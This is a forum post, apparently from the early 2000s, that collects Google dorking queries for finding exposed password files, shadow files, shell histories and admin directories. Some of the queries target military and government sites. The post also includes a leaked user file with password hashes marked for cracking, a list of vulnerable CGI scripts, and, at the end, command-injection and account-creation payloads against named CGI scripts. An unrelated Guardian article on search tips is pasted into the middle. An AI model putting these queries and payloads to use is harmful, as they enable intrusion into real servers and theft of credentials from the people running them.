Jump to content
io.kent

Exploiter

Recommended Posts

Everyone knows google in the security sector...and what a powerful tool it is , just by entering certain search strings you can gain a vast amount of knowledge and information of your chosen target...often revealing sensitive data...this is all down to badly configured systems...brought on by sloppy administration allowing directory indexing and accessing , password files , log entrys , files , paths ,etc , etc

Search Tips

so how do we start ?

the common search inputs below will give you an idea...for instance if you want to search for the an index of "root"

in the search box put in exactly as you see it in bold

===================

example 1:

allintitle: "index of/root"

result:

what it reveals is 2,510 pages that you can possible browse at your will...

====================

example 2

inurl:"auth_user_file.txt"

this result spawned 414 possible files to access

here is an actual file retrieved from a site and edited , we know who the admin is and we have the hashes thats a job for JTR (john the ripper)

txUKhXYi4xeFs|master|admin|Worasit|Junsawang|xxx@x xx|on

qk6GaDj9iBfNg|tomjang||Bug|Tom|xxx@xxx|on

with the many variations below, it should keep you busy for a long time mixing them reveals many different permutations

*************************************

SEARCH PATHS more to be added

*************************************

"Index of /admin"

"Index of /password"

"Index of /mail"

"Index of /" +passwd

"Index of /" +password.txt

"Index of /" +.htaccess

index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index

authors.pwd.index

service.pwd.index

filetype:config web

gobal.asax index

allintitle: "index of/admin"

allintitle: "index of/root"

allintitle: sensitive filetype:doc

allintitle: restricted filetype :mail

allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt

inurl:admin filetypeb

inurl:iisadmin

inurl:"auth_user_file.txt"

inurl:"wwwroot/*."

top secret site:mil

confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)

allinurl:/bash_history

intitle:"Index of" .sh_history

intitle:"Index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

intitle:"index of" members OR accounts

intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS

_vti_inf.html

service.pwd

users.pwd

authors.pwd

administrators.pwd

shtml.dll

shtml.exe

fpcount.exe

default.asp

showcode.asp

sendmail.cfm

getFile.cfm

imagemap.exe

test.bat

msadcs.dll

htimage.exe

counter.exe

browser.inc

hello.bat

default.asp

dvwssr.dll

cart32.exe

add.exe

index.jsp

SessionServlet

shtml.dll

index.cfm

page.cfm

shtml.exe

web_store.cgi

shop.cgi

upload.asp

default.asp

pbserver.dll

phf

test-cgi

finger

Count.cgi

jj

php.cgi

php

nph-test-cgi

handler

webdist.cgi

webgais

websendmail

faxsurvey

htmlscript

perl.exe

wwwboard.pl

www-sql

view-source

campas

aglimpse

glimpse

man.sh

AT-admin.cgi

AT-generate.cgi

filemail.pl

maillist.pl

info2www

files.pl

bnbform.cgi

survey.cgi

classifieds.cgi

wrap

cgiwrap

edit.pl

perl

names.nsf

webgais

dumpenv.pl

test.cgi

submit.cgi

guestbook.cgi

guestbook.pl

cachemgr.cgi

responder.cgi

perlshop.cgi

query

w3-msql

plusmail

htsearch

infosrch.cgi

publisher

ultraboard.cgi

db.cgi

formmail.cgi

allmanage.pl

ssi

adpassword.txt

redirect.cgi

cvsweb.cgi

login.jsp

dbconnect.inc

admin

htgrep

wais.pl

amadmin.pl

subscribe.pl

news.cgi

auctionweaver.pl

.htpasswd

acid_main.php

access.log

log.htm

log.html

log.txt

logfile

logfile.htm

logfile.html

logfile.txt

logger.html

stat.htm

stats.htm

stats.html

stats.txt

webaccess.htm

wwwstats.html

source.asp

perl

mailto.cgi

YaBB.pl

mailform.pl

cached_feed.cgi

global.cgi

Search.pl

build.cgi

common.php

show

global.inc

ad.cgi

WSFTP.LOG

index.html~

index.php~

index.html.bak

index.php.bak

print.cgi

register.cgi

webdriver

bbs_forum.cgi

mysql.class

sendmail.inc

CrazyWWWBoard.cgi

search.pl

way-board.cgi

webpage.cgi

pwd.dat

adcycle

post-query

help.cgi

there are two many people to thank for the bits of information cut and pasted and added to form this paper

most have been collected from various forums , txt , doc's etc...like to thank you all, its not intended to rip anyone

its just a combo of various search inputs...put on the one Paper to use as a reference.

Some theory on the google..

Specific filetypes are: *.xls, *.doc, *.db, *.mdb, *.cfg, *.pwd etc etc, use your emagination willya?

Commands you can use

Filetype:xls would bring only .xls (Excel files) in your results.

Filetype:mdb would bring only .mdb (MS Access) files in your results

etc etc, you get what I mean..

Inurl:admin would bring you a result where the word admin is in the URL

Inurl:webadmin.php would bring you a result where you can find some nice webadmin.php editors, many unprotected.

"Index of" root Would give you the index of root folder in a webserver.

"Index of" admin Yeah, guess..

Site:gov would bring up only .gov domains.

Site:co.uk should bring up only .co.uk domains..

Intitle:anyword would, guess what.., find pages with the anyword word in the title!

And now to combine these fine searchoptions

inurl:nasa.gov filetype:xls "restricted"

site:mil filetype:xls "password"

site:mil "index of" admin

- USE YOUR IMAGINATION!

Words to search for, which is probably a good bunch of words can be some of these:

password, passwords, uid, user, userid, username, pass, pwd, account, accounts, login, logins, secret, secrets. all followed by either .mdb, .db, .xls .doc or any other nice file extension.

Some theory and thoughts

Admin.cfg - is mostly a config file of some sort. It shouldnt be accesible via the web, but hey, it's the year of 2003, anything's possible..

try i.e. inurl:admin.cfg "index of"

or something like that.

webeditor.php - an official editor to edit the web page. Used by admins all over the world.

Searc for it and you might strike gold.. or not

Intitle restricts your search to titles of the web pages.

Allintitle does the same, but where all the words in the searchstring must be in the title.

intitle:"Gorge Bush"

allintitle:"money supply" economics

__________________________________

Inurl restricts your search to the URL of web pages.

Inurl:help

Inurl:Search Help

__________________________________

Intext searches only bodytext (Ignores link text, URLs and titles)

intext:"yahoo.com"

intext:html

__________________________________

Inanchor searches for a page's link anchors. A link anchor is the descriptive text of a link. For example in A Cool Page the anchor is "A Cool Page".

inanchor:"t0bban"

__________________________________

Site allows you to narrow down your search by either a site or a top level domain.

site:loc.gov

site:thomas.loc.gov

site:edu

site:nc.us

__________________________________

Link returns a list of pages linking to that specific URL.

Use link:Google and you'll end up with a bunch of pages which all link to Google.com. (Don't bother to put http:// infront, google just disregards it)..

link:Google

__________________________________

Cache finds a copy of the page that Google indexed even if that page is no longer availible at it's original URL or has since changed it's content completely. This is great for pages that changes often.

cache:Google

__________________________________

Daterange limits your search to a particular date or range of dates that a page was indexed.

NOTE: It works with Julian, not Gregorian dates.

"George Bush" daterange:2452389-2452389

neurosurgery daterange:2452389-2452389

__________________________________

Filetype searches the suffices of filename extensions.

As long as the site isn't hiding behind proxy'ing stuff, or redirection, this is great.

filetype:pdf homeschooling

"leading economic indicators" filetype:ppt

__________________________________

Related as you might expect, finds pages that are related to the specified page. This is a good way to find categories of pages; a search for related:google.com would return a variety of searchengines, including HotBot, Yahoo! and Northern light.

related:Yahoo!

related:CNN.com International - Breaking, World, Business, Sports, Entertainment and Video News

__________________________________

By using: "Index of /" +password.txt" via google

How to Get into A Site that Seems to Be Shut Down

Next, let's find out how to look inside an Internet host computer that doesn't let you normally view its web site. Here's a slightly foobarred example of http://www.foopowersearch.com. Sure enough, its web site is unavailable. But we're hackers, so maybe we can prowl around anyhow.

We can skip the use of a search engine on this one by just entering interesting URLs. Or you could use a search engine to find those hidden interesting URLs for you. You can go to Google.com and use the search term inurl:foopowersearch.com to find out everything its amazingly sophisticated web crawlers might have located on that site. With Google, if the site is even not connected to the Internet that day, you can also use its archives of sites to get a stored copy. Or, try Archive.org, which carries copies of many web sites so detailed that you can sometimes even view copies dating back to the mid-90s.

---------------------------------------------------------------------

How to Find Hidden Music Files

Let's start with something fun and useful. You can get sued or infected by viruses by using a peer-to-peer file program to download music from other folks, home computers. However, there are many Internet servers that offer free, legal music. Here's a way to find even the most obscure of them, even find files that aren't listed on the web page associated with the download site. Most ftp servers (which offer downloads) keep everything in a directory called ftproot.

Try a Google search on inurl:ftproot. Here's one I found.

Using a download site such as this is pretty good insurance against getting sued for music piracy. Although some sleazy web sites do offer pirated music files, they get shut down fast. In this case, by using the "Index of" search trick, you have found a way to view the web site that tells you the dates of its files. This site has clearly been in business a long time. This suggests it isn't a piracy site.

Most importantly, you can read the date of each individual music file. If it is before 2003, you can be pretty sure it isn't one of those fingerprinted files the RIAA is using to catch pirates. And if you swear off using peer-to-peer file sharing programs entirely, no one is going to be able to use these programs to snoop on your hard drive.

---------------------------------------------------------------------

How to Find Password Files

Is this too boring? Let's hunt for passwords. A search on Google for intitle:"Index of /etc" brings up

OK, that file that says "passwd" looks really interesting. You can read it with your browser by just clicking on it. However, you are likely to be disappointed. You'll probably see something like this. No actual passwords.

Their are several reasons for this. Today most Unix and Linux computers keep mostly just user names in the file /etc/passwd. Some don't even keep user names because a different computer might be handling authentication.

Despite this, the contents of this /etc/passwd are really exciting. This reveals the user names of the people who are probably deeply involved in running this Internet server: dave, nick, pete, ben and rwn. You can probably email them at, for example, dave@foogardelinux.org and so forth. Note that I have foobarred the real name of this web server so as to not embarrass them

---------------------------------------------------------------------

Admin Directories

__________________________________________________ ________

Nothing really new in this article but one thing i found interesting was there privacy policy.

Taken from The Guardian

Delivering the goods

There's no doubting Google's power and popularity. Yet few of us use the search engine effectively. Jack Schofield offers some tips

Thursday January 8, 2004

The Guardian

Google is now the world's most powerful website, and if it goes public this year, its young founders, Larry Page and Sergey Brin, will become extremely rich. Their five-year-old company has already cracked its biggest problem, which is how to make pots of money from selling advertising space without carrying any banner ads. And while there are other places to search the web, most websites are now dependent on Google for a large proportion of their new visitors. The question that drives all but a few commercial webmasters today is: "How do I change my site to make it appear on the first page when someone searches Google?"

What is even more impressive is that Google has achieved its supremacy by word of mouth: by delivering what users want. That has helped it retain users' confidence while doing things that might have raised concerns about invasion of privacy elsewhere. For example, Google almost certainly knows more about you than you would tell your mother. Did you ever search for information about Aids, cancer, mental illnesses or bomb-making equipment? Google knows, because it has put a unique reference number in a permanent cookie on your hard drive (which doesn't expire until 203. It also knows your internet (IP) address.

Google's privacy policy says that it "notes and saves information such as time of day, browser type, browser language, and IP address with each query. That information is used to verify our records and to provide more relevant services to users. For example, Google may use your IP address or browser language to determine which language to use when showing search results or advertisements." (See Google Privacy Center).

If you add the Google Toolbar to your Windows browser, then it can send Google information about the pages you view, and Google can update the Toolbar code automatically, without asking you. However, you can disable the Toolbar's "advanced features" by going to the Google menu and selecting privacy information. And it isn't "spyware" because Google isn't collecting information to sell, just to provide you with better searches.

People could also get better results simply by improving their search techniques. Few bother, which is a pity, because fruitless searches waste a lot of time. If you make more than a dozen searches a day, then a small improvement in your techniques can deliver dramatic benefits. With that in mind, here are my top 10 search tips.

Imagine what you want

It may sound obvious, but you have to search Google for the words that will be on the page you want, not for a description of the page or website. For example, if you wanted to find a comparative review of various PDAs, then - using the convention that anything inside square brackets is what you would type into Google - you could search for [comparative review of pdas]. The alternative is to imagine the sort of review you want. It will probably include the words Palm, Pocket PC, iPaq and Clie, so instead, try searching for [review palm pocket pc ipaq clie].

Use quotation marks

If you search for, say, [John Adams], Google will find all the pages with John and all the pages with Adams, even if the words are unconnected. This finds 3.6m hits. However, if you put the words in quotation marks, this tells Google to treat them as one unit. Using ["John Adams"] eliminates 3m hits. It is especially important to use quotes if you are looking for something that includes a "stop word". These are the words Google ignores, because they are too common. They include: a, about, are, at, by, from, I, in, of, how, la, that, the, this, to, will, who, what, where, and when. If you search for the band [the smiths] then Google will ignore "the," the stop word, so it is better to search for ["the smiths"]. However, if your search only contains stop words, Google will search for them, though ["the who"] still works better than [the who].

Use the + sign

Another way to make sure Google includes a particular word in its search is to put a plus sign in front of it.

Use the - sign

The plus sign adds a word to a search so using a minus sign takes one away. This is very useful as a way of eliminating lots of hits you don't want. I frequently search for technical information on stupidly difficult things such as transferring files from a MiniDisc player to a PC, and often get deluged with results from shopping and price comparison sites such as Dealtime, Kelkoo and Bizrate. Many of these can be eliminated by adding -merchant to the search term.

Try a wild card

Some experienced searchers don't like Google because they think it doesn't allow them to exploit hard-won skills in creating Boolean searches using "wild cards" and AND and OR commands (see below). But Google understands more than it often lets on. For example, suppose you want to find a number of quiz sites that decide what kind of flower, bird, geek or tin-pot dictator you are. You will probably be surprised to hear that searching for ["what * am I"] will do that, with the asterisk acting as a "wild card" for any word. You can also use two or more asterisks together for longer phrases. Searching for ["from * to * pc"] can be useful, and wild cards are not counted in the 10-word search allowance.

Use the site: command

Look at a page of Google results and you should notice that some hits are indented. This is because many sites would produce thousands of hits for a term, but Google shows only two from each site. It indents the second result and adds a link that offers "More results from" that site. For example, search for ["nathan milstein"] then scroll down and click on the link for "more results link for classical.onino.co.uk". This restricts the hits to that site. Now if you look in the search box, you will see that it says site:classical.onino.co.uk. This is the site: command, and you can type it in directly to search any site you like. It helps, of course, if the site has a short name, such as imdb.com [tampopo dvd site:imdb.com]. The neat thing is that you don't have to use a whole site name: you can search or exclude whole domains. For example, you can search for [tampopo dvd site:co.uk] or [tampopo dvd -site:com].

Use the operators

The site: operator is one of a long list that Google understands. These include filetype: (eg doc or pdf), intext: and allintext:, intitle: and allintitle:, inurl: and allinurl:, author: (in Google Groups) and location: (in Google News). What is the rest of the world saying about Beagle 2? Search for [beagle+2 -location:uk] to find out.

Google also understands a logical OR, as long as it is in caps. This means you can search for a hotel in Leeds OR Bradford, for example. It is very useful when people, places or things have alternative or variable spellings: [outsourcing bombay OR mumbai]. The OR command can be shortened to a vertical bar (|), as in [outsourcing bombay | mumbai]. Another way of adding alternatives is to use a twidde or tilde character (~). Thus if you search for [~food], Google also searches for cooking, cuisine, nutrition, recipes and restaurants.

The Advanced Search page

Fortunately, you don't have to learn all these special operators to use them. All you have to do is click on Google's Advanced Search link. This brings up a form with drop-down menu choices that lets anyone make complex searches without even thinking about it. This page includes options to search a particular period or pages in a specified language.

Other enhanced searches

Google is always adding new features, and as well as being a search engine, it also works as a dictionary (define, a glossary , and a very powerful calculator. It can even work out [the answer to life, the universe and everything]. But Google has also opened up its programming interface (API) so that other people can create applications to search its database of web pages. So far, most of these experiments are not very useful, but you can search recently added pages at GooFresh and compare results for keywords at GoogleFight. For more examples, see Google Tools.

Try a different search engine

Google is wonderful, there's no doubt about that. However, it does not always find the pages you want, so it is just as well to keep some alternatives handy. The main ones include stalwarts Alta Vista and All The Web, plus Vivisimo Vivisimo.com and Teoma. There are also "metasearch" search engines such as Dogpile and Metacrawler, which will send your query to several search engines at once. Google knows you have a choice, and it doesn't hurt to exercise it from time to time.

More from the Online team

Relevant articles

09.09.2003: Net notes: Google

01.11.2003: Microsoft runs search for a way to take over Google

18.02.2003: Google buys Blogger web service

Google comment

25.10.2003: Edmond Warner: Googlemania could crash to earth

27.02.2003: Simon Waldman: Google is the net dominator

Useful links

Google - corporate information

SearchEngineWatch.com

Search Engine Showdown

/cgi-bin/mailit.cgi

Post Data:

MailTo=docl&Error=&Sucess=|echo;ls -al

*************************************

/cgi-bin/dbm-passwd.cgi

Add username and password:

ADD+pfilelocation+username+password

*************************************

/cgi-sys/guestbook.cgi

server browsing:

user=cpanel&template=|command|

*************************************

/cgi-bin/w_mem.cgi?debug_on=1

&action=add&SiteID=ptnprn&sys_pass=m4rqqueyt391&us ername=HackO&password=RuleZ

*************************************

to be found in cgi-bin dir:

ubpasswd.cgi

POST data:

act=ins&user=&pass=

OR

act=del&user=

no need to use the intitle operator if you want to restrict your search to a specific domain, use the site operator instead. Like explained in the paper i posted previously. there is a table resuming the different operator.

exemple:

"index of /private" site:mil

you can also use negate this operator

exemple"

"index of /private" -site:net -site:com -site:org

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...